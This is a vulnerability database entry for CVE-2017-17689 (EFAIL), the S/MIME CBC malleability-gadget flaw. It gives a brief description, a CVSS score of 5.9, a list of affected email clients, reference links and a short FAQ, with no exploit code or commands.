Vulnerability Description
The S/MIME specification allows a Cipher Block Chaining (CBC) malleability-gadget attack that can indirectly lead to plaintext exfiltration, aka EFAIL.
CVSS Score
5.9
MEDIUM
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| 9Folders | Nine | - |
| Apple | - | |
| Bloop | Airmail | - |
| Emclient | Emclient | - |
| Flipdogsolutions | Maildroid | - |
| Freron | Mailmate | - |
| Gnome | Evolution | - |
| Gmail | - | |
| Horde | Horde Imp | - |
| Ibm | Notes | - |
| Kde | Kmail | - |
| Kde | Trojita | - |
| Microsoft | Outlook | 2007 |
| Mozilla | Thunderbird | - |
| Postbox-Inc | Postbox | - |
| R2Mail2 | R2Mail2 | - |
| Ritlabs | The Bat | - |
References
- http://www.securityfocus.com/bid/104165Third Party AdvisoryVDB Entry
- https://efail.deExploitMitigationThird Party Advisory
- https://news.ycombinator.com/item?id=17066419Issue TrackingThird Party Advisory
- https://pastebin.com/gNCc8aYmThird Party Advisory
- https://twitter.com/matthew_d_green/status/996371541591019520Third Party Advisory
- https://www.synology.com/support/security/Synology_SA_18_22Third Party Advisory
- http://www.securityfocus.com/bid/104165Third Party AdvisoryVDB Entry
- https://efail.deExploitMitigationThird Party Advisory
- https://news.ycombinator.com/item?id=17066419Issue TrackingThird Party Advisory
- https://pastebin.com/gNCc8aYmThird Party Advisory
- https://twitter.com/matthew_d_green/status/996371541591019520Third Party Advisory
- https://www.synology.com/support/security/Synology_SA_18_22Third Party Advisory
FAQ
What is CVE-2017-17689?
CVE-2017-17689 is a vulnerability with a CVSS score of 5.9 (MEDIUM). The S/MIME specification allows a Cipher Block Chaining (CBC) malleability-gadget attack that can indirectly lead to plaintext exfiltration, aka EFAIL.
How severe is CVE-2017-17689?
CVE-2017-17689 has been rated MEDIUM with a CVSS base score of 5.9/10. Review the CVSS metrics above for detailed severity breakdown.
Is there a patch for CVE-2017-17689?
Check the references section above for vendor advisories and patch information. Affected products include: 9Folders Nine, Apple Mail, Bloop Airmail, Emclient Emclient, Flipdogsolutions Maildroid.